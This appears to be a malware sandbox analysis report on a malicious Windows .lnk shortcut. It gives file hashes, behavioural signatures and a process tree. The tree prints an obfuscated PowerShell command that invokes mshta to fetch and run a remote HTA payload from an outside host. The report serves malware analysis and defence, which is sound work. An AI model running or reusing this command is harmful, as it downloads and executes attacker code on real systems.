Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
11/01/2024, 07:37
Static task
static1
Behavioral task
behavioral1
Sample
a49746922bdba7a0885c55944ab705a5+af2d07066d8f7f3e364d7d832f143ee9d0c9c7a9e91842df2a67c034137bde41.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a49746922bdba7a0885c55944ab705a5+af2d07066d8f7f3e364d7d832f143ee9d0c9c7a9e91842df2a67c034137bde41.lnk
Resource
win10v2004-20231215-en
General
-
Target
a49746922bdba7a0885c55944ab705a5+af2d07066d8f7f3e364d7d832f143ee9d0c9c7a9e91842df2a67c034137bde41.lnk
-
Size
1KB
-
MD5
a49746922bdba7a0885c55944ab705a5
-
SHA1
6ec7db6e71ebfb091b7266b8ce2012ef3d2d714f
-
SHA256
af2d07066d8f7f3e364d7d832f143ee9d0c9c7a9e91842df2a67c034137bde41
-
SHA512
e17311145ca62f49e0ac1ecc34810a65f1b91cc57c45fe0d2f72494e8106ede54d258a2fd8c16f771eada18574854da8654b533dca7818183f154739849ecbf7
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3052 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1704 wrote to memory of 3052 1704 cmd.exe 29 PID 1704 wrote to memory of 3052 1704 cmd.exe 29 PID 1704 wrote to memory of 3052 1704 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\a49746922bdba7a0885c55944ab705a5+af2d07066d8f7f3e364d7d832f143ee9d0c9c7a9e91842df2a67c034137bde41.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://24help.ooguy.com/1/1.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-